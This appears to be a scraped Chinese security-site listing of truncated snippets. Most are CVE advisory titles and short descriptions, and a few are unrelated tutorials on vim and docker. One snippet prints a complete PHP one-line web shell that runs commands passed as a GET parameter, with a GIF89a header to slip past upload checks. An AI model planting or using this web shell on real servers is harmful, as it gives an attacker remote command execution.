漏洞标题 CVE-2018-10736: Nagios XI SQL Inject 漏洞描述 Nagios XI SQL Inject PoC代码

漏洞标题 CVE-2024-9617: Danswer - Insecure Direct Object Reference 漏洞描述 The application does not verify whether the attacker is the creator of the file, allowing the attacker t...

漏洞标题 CVE-2023-7246: System Dashboard < 2.8.10 - Cross-Site Scripting 漏洞描述 The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameter...

无敏感函数的php一句话(php中可用`来执行系统命令，相当于system、eval等函数)，执行命令:shell.php?1=whoami Gif89a <?php $a = `$_GET[1]`; echo $a; ?> 文字来源于- 火线 Zone-云安全...

漏洞报告 Visual Studio advisories/2021_vscode_ipynb_xss_arbitrary_file_read.md at master · justinsteven/advisories Mail.ru [#968402 http://kiwi.youdrive.today/] Information disclo...

漏洞标题 CVE-2020-9425: rConfig <3.9.4 - Sensitive Information Disclosure 漏洞描述 rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthen...

漏洞标题 CVE-2025-41243: Spring Cloud Gateway Server Webflux - Broken Access Control 漏洞描述 Spring Cloud Gateway Server Webflux contains a vulnerability caused by unsecured and e...

官方出会议总结啦！11月26号晚举行的第十七期「听火」线上会议沙龙高能不断。会议分享嘉宾为：303，分享议题为：看似朴实无华的弱口令。 引言 大家觉得在登录功能中常见的漏洞有哪些？常见的漏...

漏洞标题 Atlassian Confluence CVE-2023-22527 远程命令执行漏洞 漏洞描述 Atlassian Confluence存在远程命令执行漏洞，此漏洞是对用户的数据缺乏校验导致的。 PoC代码 暂无

漏洞标题 CVE-2015-7450: IBM WebSphere Java Object Deserialization - Remote Code Execution 漏洞描述 IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerabili...

目录安装vim插件管理器添加插件演示删除插件：安装vim插件管理器 第一次使用插件推荐安装插件管理器，它可以简化我们安装插件的步骤。 1.下载 plug.vim 文件，根据操作系统不同，放置在以下auto...

漏洞标题 CVE-2023-38194: SuperWebMailer - Cross-Site Scripting 漏洞描述 An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter. Po...

漏洞标题 CVE-2022-0864: UpdraftPlus < 1.22.9 - Cross-Site Scripting 漏洞描述 The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in ...

有时有些docker容器执行一段时间后退出了，为了查明原因采用查看下docker容器退出的错误码，下面小编给大家带来了docker错误码的操作步骤，一起看看吧 有时有些docker容器执行一段时间后退出了...

漏洞标题 CVE-2014-3704: Drupal SQL Injection 漏洞描述 The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepar...

漏洞标题 CVE-2021-44528: Open Redirect in Host Authorization Middleware 漏洞描述 Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed ho...